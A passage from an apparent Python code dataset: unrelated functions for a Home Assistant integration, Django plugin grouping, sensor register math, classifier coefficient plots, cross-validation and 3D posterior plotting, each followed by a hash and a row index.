        return False
08f2e30f134479137052fd821e53e050375cd11e
3,652,514
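A quick usage sketch for str_is_float above (illustrative only, not part of the dataset row; assumes the function is in scope):

# strings that parse as floats return True, anything else returns False
print(str_is_float("3.14"))   # True
print(str_is_float("abc"))    # False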
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
    """Set up Ruckus Unleashed from a config entry."""
    try:
        ruckus = await hass.async_add_executor_job(
            Ruckus,
            entry.data[CONF_HOST],
            entry.data[CONF_USERNAME],
            entry.data[CONF_PASSWORD],
        )
    except ConnectionError as error:
        raise ConfigEntryNotReady from error

    coordinator = RuckusUnleashedDataUpdateCoordinator(hass, ruckus=ruckus)

    await coordinator.async_refresh()
    if not coordinator.last_update_success:
        raise ConfigEntryNotReady

    hass.data[DOMAIN][entry.entry_id] = {
        COORDINATOR: coordinator,
        UNDO_UPDATE_LISTENERS: [],
    }

    for platform in PLATFORMS:
        hass.async_create_task(
            hass.config_entries.async_forward_entry_setup(entry, platform)
        )

    return True
567af55b3f46c2b5e2ef5204dbe85fabb87c9a74
3,652,516
def get_user_plugins_grouped(get_allowed_plugin_uids_func,
                             get_registered_plugins_grouped_func,
                             registry, user, sort_items=True):
    """Get user plugins grouped.

    :param callable get_allowed_plugin_uids_func:
    :param callable get_registered_plugins_grouped_func:
    :param fobi.base.BaseRegistry registry: Subclass of
        ``fobi.base.BaseRegistry`` instance.
    :param django.contrib.auth.models.User user:
    :param bool sort_items:
    :return dict:
    """
    ensure_autodiscover()

    if not RESTRICT_PLUGIN_ACCESS or getattr(user, 'is_superuser', False):
        return get_registered_plugins_grouped_func()

    registered_plugins = {}

    allowed_plugin_uids = get_allowed_plugin_uids_func(user)

    for uid, plugin in registry._registry.items():
        if uid in allowed_plugin_uids:
            if PY3:
                plugin_name = force_text(plugin.name, encoding='utf-8')
                plugin_group = force_text(plugin.group, encoding='utf-8')
            else:
                plugin_name = force_text(
                    plugin.name, encoding='utf-8'
                ).encode('utf-8')
                plugin_group = force_text(
                    plugin.group, encoding='utf-8'
                ).encode('utf-8')

            if plugin_group not in registered_plugins:
                registered_plugins[plugin_group] = []
            registered_plugins[plugin_group].append((uid, plugin_name))

    if sort_items:
        for key, prop in registered_plugins.items():
            prop.sort()

    return registered_plugins
f355738b99f503568a35945e1008f84145569b62
3,652,517
def calc_randnm7(reg_dict, mlx75027):
    """
    Calculate the RANDNM7 register value

    Parameters
    ----------
    reg_dict : dict
        The dictionary that contains all the register information
    mlx75027 : bool
        Set to True if using the MLX75027 sensor, False if using the MLX75026 sensor.

    Returns
    ----------
    randnm7 : int
        The randnm7 register value
    """
    # print("calc_randnm7()")
    speed = calc_speed(reg_dict, mlx75027)
    hmax = calc_hmax(reg_dict, mlx75027, speed=speed)

    pretime_enabled = np.any(
        reg_dict["Px_PREHEAT"][2] | reg_dict["Px_PREMIX"][2])

    if pretime_enabled:
        px_pretime = calc_pretime(reg_dict, mlx75027)
        # As noted in 7.12. can be calculated as:
        # 1070 + HMAX * FLOOR(((Px_PRETIME(in us) - 11.13) / HMAX) * 120), with Px_PRETIME >= 11.13
        if px_pretime >= 11.13:
            randnm7 = 1070 + hmax * np.floor(((px_pretime - 11.13) / hmax) * 120)
        else:
            randnm7 = 1070
    else:
        randnm7 = 1070
    return int(randnm7)
898c4662f045fbcbe655870a8d5642de92debcaf
3,652,518
def get_orientation(pose, ori):
    """Generate an orientation vector from yaw/pitch/roll angles in radians."""
    yaw, pitch, roll = pose
    c1 = np.cos(-yaw)
    s1 = np.sin(-yaw)
    c2 = np.cos(-pitch)
    s2 = np.sin(-pitch)
    c3 = np.cos(-roll)
    s3 = np.sin(-roll)

    Ryaw = np.array([[c1, s1, 0],
                     [-s1, c1, 0],
                     [0, 0, 1]])
    Rpitch = np.array([[c2, 0, -s2],
                       [0, 1, 0],
                       [s2, 0, c2]])
    Rroll = np.array([[1, 0, 0],
                      [0, c3, s3],
                      [0, -s3, c3]])
    R = np.dot(Ryaw, np.dot(Rpitch, Rroll))

    n = np.dot(R, ori)
    return n
d00cc9befde7afd28b66c572116fb1234e109367
3,652,519
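A minimal sanity check for get_orientation above (illustrative sketch, not part of the dataset row; assumes numpy and the function are in scope): with an all-zero pose the combined rotation is the identity, so the input orientation comes back unchanged.

import numpy as np

# identity pose should return the input orientation unchanged
n = get_orientation((0.0, 0.0, 0.0), np.array([0.0, 0.0, 1.0]))
print(n)  # expected: [0. 0. 1.]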
import copy


def draw_deformation(source_image, grid, grid_size=12):
    """
    source_image: PIL image object
    sample_grid: the sampling grid
    grid_size: the size of drawing grid
    """
    im = copy.deepcopy(source_image)
    d = ImageDraw.Draw(im)
    H, W = source_image.size
    dist = int(H / grid_size)
    for i in range(grid_size):
        step = int(dist * i)
        d.line(list(zip((grid[0, step, :, 0].numpy() + 1) / 2 * H,
                        (grid[0, step, :, 1].numpy() + 1) / 2 * H)), fill=255, width=1)
        d.line(list(zip((grid[0, :, step, 0].numpy() + 1) / 2 * H,
                        (grid[0, :, step, 1].numpy() + 1) / 2 * H)), fill=255, width=1)
    return im
ec9c6b90e89221789ecba55e2c2360ccd24f9c8c
3,652,520
def dial_socket(port, host='localhost'):
    """
    Connect to the socket created by the server instance
    on specified host and port
    """
    # note: the required `port` parameter must come before the defaulted `host`,
    # otherwise the original signature is a SyntaxError
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    return sock
555c90f05cdf0feda97d5db160dd048542e03376
3,652,521
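A hedged usage sketch for dial_socket above, using the corrected signature where port comes first (illustrative only; assumes a TCP server is already listening on localhost:8080):

sock = dial_socket(8080)   # connect to localhost:8080
sock.sendall(b"ping")
sock.close()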
def analyseClassificationCoefficients(X: pd.DataFrame, y: pd.Series, D_learning_results: pd.DataFrame,
                                      outputPath: str) -> dict:
    """
    This function evaluates the importance coefficients of the input features of a model

    Args:
        X (pd.DataFrame): Input pandas dataFrame.
        y (pd.Series): Input pandas series with target label.
        D_learning_results (pd.DataFrame): Results dataframe obtained from a grid search
            (analytics.learning.grids).
        outputPath (str): Output filename path to save the results.

    Returns:
        dict: Dictionary of matplotlib figures keyed by "<model name>_<plot type>".
    """
    output_figures = {}

    # define the confusion matrix
    x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
    for index, row in D_learning_results.iterrows():
        y_pred = row['MODEL'].predict(x_test)
        cm = confusion_matrix(y_test, y_pred)

        # plot the confusion matrix
        fig = plt.figure(figsize=(9, 9))
        ax = fig.gca()
        sns.heatmap(cm, annot=True, fmt=".3f", linewidths=.5, square=True, cmap='Blues_r')
        plt.ylabel('Actual label')
        plt.xlabel('Predicted label')
        ax.set(xticks=np.arange(cm.shape[1]), yticks=np.arange(cm.shape[0]))
        ax.set_xticklabels(labels=row['MODEL'].classes_, rotation=45)
        ax.set_yticklabels(labels=row['MODEL'].classes_, rotation=45)
        all_sample_title = 'Accuracy Score: {0}'.format(np.round(row['SCORE_TEST'], 2))
        plt.title(f"Model: {row['MODEL_NAME']}, {all_sample_title}", size=15)
        output_figures[f"{row['MODEL_NAME']}_confusionMatrix"] = fig

        # analyse output for QDA
        if row['MODEL_NAME'] == 'quadratic_discriminant_analysis':
            # Print the mean for each class
            # create a dataframe with one row for each feature of X
            features_list = list(X.columns)
            # extract coefficients (resume from here)
            fig = plt.figure(figsize=(12, 10))
            means = row['MODEL'].means_
            means_scaled = scale(means)
            plt.imshow(means_scaled, cmap='bwr')
            ax = fig.gca()
            # set xticks
            ax.set_xticks(range(0, len(features_list)))
            ax.set_xticklabels(features_list, rotation=90)
            # set yticks
            ax.set_yticks(range(0, len(row['MODEL'].classes_)))
            ax.set_yticklabels(row['MODEL'].classes_, rotation=45)
            plt.colorbar()
            plt.xlabel('Feature name')
            plt.ylabel('Classes')
            plt.title('QDA means per class')
            output_figures[f"{row['MODEL_NAME']}_means"] = fig

        # analyse output for LDA
        elif row['MODEL_NAME'] == 'linear_discriminant_analysis':
            # Print coefficients
            # create a dataframe with one row for each feature of X
            features_list = list(X.columns)
            # extract coefficients (resume from here)
            fig = plt.figure(figsize=(12, 10))
            coefficients = row['MODEL'].coef_
            coefficients_scaled = scale(coefficients)
            plt.imshow(coefficients_scaled, cmap='bwr')
            ax = fig.gca()
            # set xticks
            ax.set_xticks(range(0, len(features_list)))
            ax.set_xticklabels(features_list, rotation=90)
            # set yticks
            ax.set_yticks(range(0, len(row['MODEL'].classes_)))
            ax.set_yticklabels(row['MODEL'].classes_, rotation=45)
            plt.colorbar()
            plt.xlabel('Feature name')
            plt.ylabel('Classes')
            plt.title('LDA coefficients')
            output_figures[f"{row['MODEL_NAME']}_coefficients"] = fig

        # analyse output for logistic regression
        elif row['MODEL_NAME'] == 'logistic_regression':
            # Print coefficients
            # create a dataframe with one row for each feature of X
            features_list = list(X.columns)
            # extract coefficients (resume from here)
            fig = plt.figure(figsize=(12, 10))
            coefficients = row['MODEL'].coef_
            coefficients_scaled = scale(coefficients)
            plt.imshow(coefficients_scaled, cmap='bwr')
            ax = fig.gca()
            # set xticks
            ax.set_xticks(range(0, len(features_list)))
            ax.set_xticklabels(features_list, rotation=90)
            # set yticks
            ax.set_yticks(range(0, len(row['MODEL'].classes_)))
            ax.set_yticklabels(row['MODEL'].classes_, rotation=45)
            plt.colorbar()
            plt.xlabel('Feature name')
            plt.ylabel('Classes')
            plt.title('Logistic regression coefficients')
            output_figures[f"{row['MODEL_NAME']}_coefficients"] = fig

        elif row['MODEL_NAME'] == 'naive bayes':
            # Print coefficients
            # create a dataframe with one row for each feature of X
            features_list = list(X.columns)
            # print variance
            fig = plt.figure(figsize=(12, 10))
            coefficients = row['MODEL'].sigma_
            coefficients_scaled = scale(coefficients)
            plt.imshow(coefficients_scaled, cmap='bwr')
            ax = fig.gca()
            # set xticks
            ax.set_xticks(range(0, len(features_list)))
            ax.set_xticklabels(features_list, rotation=90)
            # set yticks
            ax.set_yticks(range(0, len(row['MODEL'].classes_)))
            ax.set_yticklabels(row['MODEL'].classes_, rotation=45)
            plt.colorbar()
            plt.xlabel('Feature name')
            plt.ylabel('Classes')
            plt.title('Naive bayes sigma')
            output_figures[f"{row['MODEL_NAME']}_sigma"] = fig

            # print mean
            fig = plt.figure(figsize=(12, 10))
            coefficients = row['MODEL'].theta_
            coefficients_scaled = scale(coefficients)
            plt.imshow(coefficients_scaled, cmap='bwr')
            ax = fig.gca()
            # set xticks
            ax.set_xticks(range(0, len(features_list)))
            ax.set_xticklabels(features_list, rotation=90)
            # set yticks
            ax.set_yticks(range(0, len(row['MODEL'].classes_)))
            ax.set_yticklabels(row['MODEL'].classes_, rotation=45)
            plt.colorbar()
            plt.xlabel('Feature name')
            plt.ylabel('Classes')
            plt.title('Naive bayes theta')
            output_figures[f"{row['MODEL_NAME']}_theta"] = fig

        elif row['MODEL_NAME'] == 'decision tree':
            # Print coefficients
            # create a dataframe with one row for each feature of X
            features_list = list(X.columns)
            # print variance
            fig = plt.figure(figsize=(12, 10))
            coefficients = row['MODEL'].feature_importances_
            # coefficients_scaled = scale(coefficients)
            plt.bar(features_list, coefficients)
            ax = fig.gca()
            # set xticks
            # ax.set_xticks(range(0, len(features_list)))
            ax.set_xticklabels(features_list, rotation=45)
            plt.xlabel('Feature name')
            plt.ylabel('Feature importance')
            plt.title('Decision tree Gini importance')
            output_figures[f"{row['MODEL_NAME']}_Gini"] = fig

            # save the decision tree
            dotfile = open(f"{outputPath}//dt.dot", 'w')
            tree.export_graphviz(row['MODEL'], out_file=dotfile, feature_names=features_list,
                                 class_names=row['MODEL'].classes_, rounded=True, proportion=False,
                                 precision=2, filled=True)
            dotfile.close()
            # http://webgraphviz.com/

        else:
            print(f"{row['MODEL_NAME']}, model not considered")

    return output_figures
2e6a1e4e05d505ab5e43c638810fc23a6b11a228
3,652,522
def centerfreq_to_bandnum(center_freq, norm_freq, nth_oct):
    """Returns band number from given center frequency."""
    return nth_oct * np.log2(center_freq / norm_freq)
857b9b2598981ba608c958c8acce35a1e71d021f
3,652,523
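A worked example for centerfreq_to_bandnum above (illustrative only; assumes numpy and the function are in scope): one octave above the reference frequency in third-octave bands gives band number 3, since log2(2000 / 1000) = 1 and 3 * 1 = 3.

print(centerfreq_to_bandnum(2000.0, 1000.0, 3))  # 3.0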
from typing import Union
from typing import Sequence
from typing import Optional


def crossval_model(
    estimator: BaseEstimator,
    X: pd.DataFrame,
    y: Union[pd.Series, pd.DataFrame],
    evaluators: Sequence[Evaluator],
    cv: Optional[
        Union[int, BaseCrossValidator]
    ] = None,  # defaults to KFold(n_splits=5)
    random_state: Optional[Union[int, np.random.RandomState]] = None,
    stratify: Optional[Union[np.ndarray, pd.Series]] = None,
    n_jobs=1,
) -> Sequence[Evaluator]:
    """
    Evaluate a model using cross validation.

    A list of evaluators determines what other metrics, such as feature
    importance and partial dependence are computed
    """
    # Run various checks and prepare the evaluators
    random_state = check_random_state(random_state)
    cv = 5 if cv is None else cv
    if isinstance(cv, int):
        cv = KFold(n_splits=cv, shuffle=True, random_state=random_state)

    cross_val_split_generator = cv.split(X, stratify)
    evalutors_evaluations = _repeatedly_evaluate_model(
        estimator=estimator,
        X=X,
        y=y,
        train_test_indices_generator=cross_val_split_generator,
        evaluators=evaluators,
        use_group_cv=False,
        random_state=random_state,
        name_for_logging="Cross validate",
        n_jobs=n_jobs,
    )
    _set_evaluators_evaluations(evalutors_evaluations)
    return evalutors_evaluations
49c95241ed04c248221c6366cde717e575f5f7c1
3,652,524
import time


def measure_dist(positions, weights, v_ref, side=False):
    """
    Will plot the mouse and allow me to click and measure with two clicks.
    side is False (so top view) but can be True, then it's cut through the
    major axis of the mouse (determined by v_reference)
    """
    # simplest trick is to just rotate all points so the reference
    # direction is perpendicular to x
    v_ref = np.append(v_ref, 0)
    angle_with_x = angle_between(np.array([1., 0, 0]), v_ref)
    RR = rotate_body_model(0, 0, -angle_with_x)
    positions = (RR @ positions.T).T - v_ref

    if side:
        xx, yy = positions[:, 0], positions[:, 2]
    else:
        xx, yy = positions[:, 0], positions[:, 1]  # top view

    plt.figure()
    plt.scatter(xx, yy, c=weights / np.max(weights), s=5)
    # plt.xlim([-.05,.1])
    # plt.ylim([0,.15])
    ax = plt.gca()
    plt.axes().set_aspect('equal', 'datalim')
    plt.title('click center of hip, then mid, then head of mouse!')

    w, h = 570, 800
    plt.get_current_fig_manager().window.setGeometry(1920 - w - 10, 60, w, h)

    click_points = np.asanyarray(plt.ginput(0))
    if click_points.shape[0] % 2 != 0:
        print('missing a point')
        click_points = click_points[:-1, :]

    n_clicks = click_points.shape[0]
    start_points = click_points[np.arange(n_clicks) % 2 == 0, :]
    end_points = click_points[np.arange(n_clicks) % 2 == 1, :]
    n_points = start_points.shape[0]

    plt.figure()
    plt.scatter(xx, yy, c=weights / np.max(weights), s=5)
    for s, e in zip(start_points, end_points):
        plt.plot([s[0], e[0]], [s[1], e[1]], 'o-')

    dist = np.linalg.norm(end_points - start_points, axis=1)
    leg_list = [str(np.round(d, decimals=3)) + " m" for d in dist]
    plt.legend(leg_list)
    plt.xlabel("x [m]")
    plt.ylabel("y [m]")
    plt.title('distance in meters')
    # plt.xlim([-.05,.1])
    # plt.ylim([0,.15])
    ax = plt.gca()
    plt.axes().set_aspect('equal', 'datalim')

    timestr = time.strftime("%Y%m%d-%H%M%S")
    plt.savefig('/home/chrelli/git/3d_sandbox/mycetrack0p4/measurements/' + timestr + '.png')

    plt.show()
    w, h = 570, 800
    plt.get_current_fig_manager().window.setGeometry(1920 - w - 10, 60, w, h)

    return dist
4d67344b0df64d3721d87803772c8aad15936fd9
3,652,525
def _get_draft_comments(request, issue, preview=False):
    """Helper to return objects to put() and a list of draft comments.

    If preview is True, the list of objects to put() is empty to avoid changes
    to the datastore.

    Args:
      request: Django Request object.
      issue: Issue instance.
      preview: Preview flag (default: False).

    Returns:
      2-tuple (put_objects, comments).
    """
    comments = []
    tbd = []
    # XXX Should request all drafts for this issue once, now we can.
    for patchset in issue.patchset_set.order('created'):
        ps_comments = list(models.Comment.gql(
            'WHERE ANCESTOR IS :1 AND author = :2 AND draft = TRUE',
            patchset, request.user))
        if ps_comments:
            patches = dict((p.key(), p) for p in patchset.patch_set)
            for p in patches.itervalues():
                p.patchset = patchset
            for c in ps_comments:
                c.draft = False
                # Get the patch key value without loading the patch entity.
                # NOTE: Unlike the old version of this code, this is the
                # recommended and documented way to do this!
                pkey = models.Comment.patch.get_value_for_datastore(c)
                if pkey in patches:
                    patch = patches[pkey]
                    c.patch = patch
            if not preview:
                tbd.append(ps_comments)
                patchset.update_comment_count(len(ps_comments))
                tbd.append(patchset)
            ps_comments.sort(key=lambda c: (c.patch.filename, not c.left,
                                            c.lineno, c.date))
            comments += ps_comments
    return tbd, comments
affea5c09e42283057d70d7d1ce9f931d373d90d
3,652,526
def activate_model(cfg):
    """Activate the dynamic parts."""
    cfg["fake"] = cfg["fake"]()
    return cfg
df8b0a23dc683435c1379e57bc9fd98149876d9d
3,652,527
def convert_to_number(string):
    """
    Tries to cast input into an integer number, returning the
    number if successful and returning False otherwise.
    """
    try:
        number = int(string)
        return number
    except (ValueError, TypeError):
        # narrowed from a bare except: int() raises ValueError for
        # non-numeric strings and TypeError for unsupported types
        return False
30110377077357d3e7d45cac4c106f5dc9349edd
3,652,528
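Illustrative usage of convert_to_number above (not part of the dataset row; assumes the function is in scope); note that non-integer strings fall through to False.

print(convert_to_number("42"))    # 42
print(convert_to_number("4.5"))   # False, since int("4.5") raises ValueError
print(convert_to_number("abc"))   # False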
def _ts_value(position, counts, exposure, background, kernel, norm, flux_estimator):
    """Compute TS value at a given pixel position.

    Uses approach described in Stewart (2009).

    Parameters
    ----------
    position : tuple (i, j)
        Pixel position.
    counts : `~numpy.ndarray`
        Counts image
    background : `~numpy.ndarray`
        Background image
    exposure : `~numpy.ndarray`
        Exposure image
    kernel : `astropy.convolution.Kernel2D`
        Source model kernel
    norm : `~numpy.ndarray`
        Norm image. The flux value at the given pixel position is used as
        starting value for the minimization.

    Returns
    -------
    TS : float
        TS value at the given pixel position.
    """
    dataset = SimpleMapDataset.from_arrays(
        counts=counts,
        background=background,
        exposure=exposure,
        kernel=kernel,
        position=position,
        norm=norm,
    )
    return flux_estimator.run(dataset)
5a53a408205e5aecf0b2035efbc3feb33097e46c
3,652,529
from typing import List


def mean(nums: List) -> float:
    """
    Find mean of a list of numbers.
    Wiki: https://en.wikipedia.org/wiki/Mean

    >>> mean([3, 6, 9, 12, 15, 18, 21])
    12.0
    >>> mean([5, 10, 15, 20, 25, 30, 35])
    20.0
    >>> mean([1, 2, 3, 4, 5, 6, 7, 8])
    4.5
    >>> mean([])
    Traceback (most recent call last):
        ...
    ValueError: List is empty
    """
    if not nums:
        raise ValueError("List is empty")
    return sum(nums) / len(nums)
3c802b4967f646b6338e52b4ce12977274054c15
3,652,530
import scipy


def post_3d(post_paths, labels, colours, linestyles, contour_levels_sig, x_label=None, y_label=None, z_label=None,
            x_lims=None, y_lims=None, z_lims=None, smooth_xy=None, smooth_xz=None, smooth_yz=None, smooth_x=None,
            smooth_y=None, smooth_z=None, print_areas=False, save_path=None):
    """
    Produce triangle plot showing multiple 3D posteriors, each as output by plot_utils.get_3d_post.

    Args:
        post_paths (list): List of paths to 3D posterior .npz files, each as output by plot_utils.get_3d_post.
        labels (list): List of legend labels, one for each posterior grid.
        colours (list): List of colours, one for each posterior grid.
        linestyles (list): List of linestyles, one for each posterior grid.
        contour_levels_sig (list): List of confidence regions to plot in ascending order, e.g. [1, 3].
        x_label (str, optional): X-axis label - default None, i.e. no label.
        y_label (str, optional): Y-axis label - default None, i.e. no label.
        z_label (str, optional): Z-axis label - default None, i.e. no label.
        x_lims ((float, float), optional): X-axis limits - default None, limits set automatically.
        y_lims ((float, float), optional): Y-axis limits - default None, limits set automatically.
        z_lims ((float, float), optional): Z-axis limits - default None, limits set automatically.
        smooth_xy (list, optional): List of kernel standard deviations for Gaussian smoothing in the x-y plane,
                                    one for each posterior grid, or None for no smoothing (default None).
        smooth_xz (list, optional): List of kernel standard deviations for Gaussian smoothing in the x-z plane,
                                    one for each posterior grid, or None for no smoothing (default None).
        smooth_yz (list, optional): List of kernel standard deviations for Gaussian smoothing in the y-z plane,
                                    one for each posterior grid, or None for no smoothing (default None).
        smooth_x (list, optional): List of kernel standard deviations for Gaussian smoothing of the 1D x posterior,
                                   one for each posterior grid, or None for no smoothing (default None).
        smooth_y (list, optional): List of kernel standard deviations for Gaussian smoothing of the 1D y posterior,
                                   one for each posterior grid, or None for no smoothing (default None).
        smooth_z (list, optional): List of kernel standard deviations for Gaussian smoothing of the 1D z posterior,
                                   one for each posterior grid, or None for no smoothing (default None).
        print_areas (bool, optional): If True, print relative areas/widths of the different posteriors.
                                      Note that smoothing can affect these results, so for reliable results
                                      smoothing should be switched off to extract relative areas, and then smoothing
                                      values should be set to preserve unsmoothed relative areas. Default False.
        save_path (str, optional): Path to save figure to, if supplied. If not supplied, figure is displayed.
    """

    # Load unnormalised 3D posteriors
    post_grids = []
    for post_idx, post_path in enumerate(post_paths):
        print(f'Loading {post_idx + 1} / {len(post_paths)}')
        with np.load(post_path) as data:
            x_grid_tmp = data['x_grid']
            y_grid_tmp = data['y_grid']
            z_grid_tmp = data['z_grid']
            post_grids.append(data['post_grid'])

        # Check grids consistent
        if post_idx == 0:
            x_grid, y_grid, z_grid = x_grid_tmp, y_grid_tmp, z_grid_tmp
        else:
            assert np.array_equal(x_grid, x_grid_tmp)
            assert np.array_equal(y_grid, y_grid_tmp)
            assert np.array_equal(z_grid, z_grid_tmp)

    # Form 1D & 2D grids
    print('Forming 1D & 2D grids')
    x = x_grid[:, 0, 0]
    y = y_grid[0, :, 0]
    z = z_grid[0, 0, :]
    xy_x, xy_y = np.meshgrid(x, y, indexing='ij')
    xz_x, xz_z = np.meshgrid(x, z, indexing='ij')
    yz_y, yz_z = np.meshgrid(y, z, indexing='ij')

    # Calculate integration elements
    print('Calculating integration elements')
    dx = x[1] - x[0]
    dy = y[1] - y[0]
    dz = z[1] - z[0]
    assert np.allclose(np.diff(x), dx)
    assert np.allclose(np.diff(y), dy)
    assert np.allclose(np.diff(z), dz)
    dxdy = dx * dy
    dxdz = dx * dz
    dydz = dy * dz
    dxdydz = dx * dy * dz

    # Normalise 3D posteriors
    print('Normalising')
    post_grids = [post_grid / (np.sum(post_grid) * dxdydz) for post_grid in post_grids]
    assert all([np.isclose(np.sum(post_grid) * dxdydz, 1) for post_grid in post_grids])

    # Marginalise to get 2D posteriors
    print('Marginalising 3D -> 2D')
    posts_xy = [np.sum(post_grid, axis=2) * dz for post_grid in post_grids]
    posts_xz = [np.sum(post_grid, axis=1) * dy for post_grid in post_grids]
    posts_yz = [np.sum(post_grid, axis=0) * dx for post_grid in post_grids]
    assert all([np.isclose(np.sum(post_xy) * dxdy, 1) for post_xy in posts_xy])
    assert all([np.isclose(np.sum(post_xz) * dxdz, 1) for post_xz in posts_xz])
    assert all([np.isclose(np.sum(post_yz) * dydz, 1) for post_yz in posts_yz])

    # Marginalise again to get 1D posteriors
    print('Marginalising 2D -> 1D')
    posts_x = [np.sum(post_xy, axis=1) * dy for post_xy in posts_xy]
    posts_y = [np.sum(post_xy, axis=0) * dx for post_xy in posts_xy]
    posts_z = [np.sum(post_xz, axis=0) * dx for post_xz in posts_xz]
    assert all([np.isclose(np.sum(post_x) * dx, 1) for post_x in posts_x])
    assert all([np.isclose(np.sum(post_y) * dy, 1) for post_y in posts_y])
    assert all([np.isclose(np.sum(post_z) * dz, 1) for post_z in posts_z])

    # Additional marginalisation checks
    print('Checking normalisation')
    assert all([np.allclose(post_x, np.sum(post_xz, axis=1) * dz) for post_x, post_xz in zip(posts_x, posts_xz)])
    assert all([np.allclose(post_y, np.sum(post_yz, axis=1) * dz) for post_y, post_yz in zip(posts_y, posts_yz)])
    assert all([np.allclose(post_z, np.sum(post_yz, axis=0) * dy) for post_z, post_yz in zip(posts_z, posts_yz)])
    assert all([np.allclose(post_x, np.sum(p_3d, axis=(1, 2)) * dydz) for post_x, p_3d in zip(posts_x, post_grids)])
    assert all([np.allclose(post_y, np.sum(p_3d, axis=(0, 2)) * dxdz) for post_y, p_3d in zip(posts_y, post_grids)])
    assert all([np.allclose(post_z, np.sum(p_3d, axis=(0, 1)) * dxdy) for post_z, p_3d in zip(posts_z, post_grids)])

    # Apply smoothing
    if smooth_xy is not None:
        posts_xy = [ndimage.gaussian_filter(post_xy, [sig, sig / 2.]) for post_xy, sig in zip(posts_xy, smooth_xy)]
    if smooth_xz is not None:
        posts_xz = [ndimage.gaussian_filter(post_xz, sig) for post_xz, sig in zip(posts_xz, smooth_xz)]
    if smooth_yz is not None:
        posts_yz = [ndimage.gaussian_filter(post_yz, sig) for post_yz, sig in zip(posts_yz, smooth_yz)]
    if smooth_x is not None:
        posts_x = [ndimage.gaussian_filter(post_x, sig) for post_x, sig in zip(posts_x, smooth_x)]
    if smooth_y is not None:
        posts_y = [ndimage.gaussian_filter(post_y, sig) for post_y, sig in zip(posts_y, smooth_y)]
    if smooth_z is not None:
        posts_z = [ndimage.gaussian_filter(post_z, sig) for post_z, sig in zip(posts_z, smooth_z)]

    # Convert 2D & 1D posteriors to confidence levels
    print('Converting to confidence levels')
    confs_xy = [gcl_post.post_to_conf(post_xy, dxdy) for post_xy in posts_xy]
    confs_xz = [gcl_post.post_to_conf(post_xz, dxdz) for post_xz in posts_xz]
    confs_yz = [gcl_post.post_to_conf(post_yz, dydz) for post_yz in posts_yz]
    confs_x = [gcl_post.post_to_conf(post_x, dx) for post_x in posts_x]
    confs_y = [gcl_post.post_to_conf(post_y, dy) for post_y in posts_y]
    confs_z = [gcl_post.post_to_conf(post_z, dz) for post_z in posts_z]

    # Extract out relative widths and areas
    contour_levels = [0.] + [scipy.special.erf(contour_level / np.sqrt(2)) for contour_level in contour_levels_sig]
    if print_areas:
        print('Note that smoothing should be switched off to extract unbiased relative areas, and smoothing should '
              'be set such that relative areas are preserved')

        def count_points_within_outermost_contour(conf_grid):
            return np.count_nonzero(conf_grid < contour_levels[-1])

        rel_areas_xy = list(map(count_points_within_outermost_contour, confs_xy))
        print('Relative areas x-y:', np.divide(rel_areas_xy, max(rel_areas_xy)))
        rel_areas_xz = list(map(count_points_within_outermost_contour, confs_xz))
        print('Relative areas x-z:', np.divide(rel_areas_xz, max(rel_areas_xz)))
        rel_areas_yz = list(map(count_points_within_outermost_contour, confs_yz))
        print('Relative areas y-z:', np.divide(rel_areas_yz, max(rel_areas_yz)))
        rel_widths_x = list(map(count_points_within_outermost_contour, confs_x))
        print('Relative widths x:', np.divide(rel_widths_x, max(rel_widths_x)))
        rel_widths_y = list(map(count_points_within_outermost_contour, confs_y))
        print('Relative widths y:', np.divide(rel_widths_y, max(rel_widths_y)))
        rel_widths_z = list(map(count_points_within_outermost_contour, confs_z))
        print('Relative widths z:', np.divide(rel_widths_z, max(rel_widths_z)))

    # Plot everything
    print('Plotting')
    plt.rcParams.update({'font.size': 13})
    plt.rcParams['axes.titlesize'] = 17
    fig, axes = plt.subplots(nrows=3, ncols=3, sharex='col', figsize=(12.8, 8.6))
    plt.subplots_adjust(left=.08, right=.97, bottom=.08, top=.97, wspace=0, hspace=0)
    fill_colours = [[np.squeeze(matplotlib.colors.to_rgba_array(c, a)) for a in [0.3, 0.1, 0]] for c in colours]

    # Row 0: x
    for post_x, colour, fill, linestyle, label in zip(posts_x, colours, fill_colours, linestyles, labels):
        axes[0, 0].plot(x, post_x, color=colour, ls=linestyle, lw=2, label=label)
        axes[0, 0].fill_between(x, post_x, color=fill[1])
    axes[0, 1].axis('off')
    axes[0, 2].axis('off')

    # Row 1: x vs y, y
    for conf_xy, post_y, colour, fill, linestyle in zip(confs_xy, posts_y, colours, fill_colours, linestyles):
        axes[1, 0].contour(xy_x, xy_y, conf_xy, levels=contour_levels, colors=colour, linestyles=[linestyle],
                           linewidths=2)
        axes[1, 0].contourf(xy_x, xy_y, conf_xy, levels=contour_levels, colors=fill)
        axes[1, 1].plot(y, post_y, color=colour, ls=linestyle, lw=2)
        axes[1, 1].fill_between(y, post_y, color=fill[1])
    axes[1, 2].axis('off')

    # Row 2: x vs z, y vs z, z
    for conf_xz, conf_yz, post_z, colour, fill, linestyle in zip(confs_xz, confs_yz, posts_z, colours, fill_colours,
                                                                 linestyles):
        axes[2, 0].contour(xz_x, xz_z, conf_xz, levels=contour_levels, colors=colour, linestyles=[linestyle],
                           linewidths=2)
        axes[2, 0].contourf(xz_x, xz_z, conf_xz, levels=contour_levels, colors=fill)
        axes[2, 1].contour(yz_y, yz_z, conf_yz, levels=contour_levels, colors=colour, linestyles=[linestyle],
                           linewidths=2)
        axes[2, 1].contourf(yz_y, yz_z, conf_yz, levels=contour_levels, colors=fill)
        axes[2, 2].plot(z, post_z, color=colour, ls=linestyle, lw=2)
        axes[2, 2].fill_between(z, post_z, color=fill[1])

    # Hide y ticks for 1D posteriors
    axes[0, 0].tick_params(axis='y', which='both', left=False, labelleft=False)
    axes[1, 1].tick_params(axis='y', which='both', left=False, labelleft=False)
    axes[2, 2].tick_params(axis='y', which='both', left=False, labelleft=False)

    # Add x ticks at top and bottom of 2D posteriors and at bottom of 1D posteriors
    axes[0, 0].tick_params(axis='x', which='both', bottom=True, direction='in')
    axes[1, 0].tick_params(axis='x', which='both', top=True, bottom=True, direction='in')
    axes[2, 0].tick_params(axis='x', which='both', top=True, bottom=True, direction='inout', length=7.5)
    axes[0, 1].tick_params(axis='x', which='both', bottom=True, direction='in')
    axes[2, 1].tick_params(axis='x', which='both', top=True, bottom=True, direction='inout', length=7.5)
    axes[2, 2].tick_params(axis='x', which='both', bottom=True, direction='inout', length=7.5)

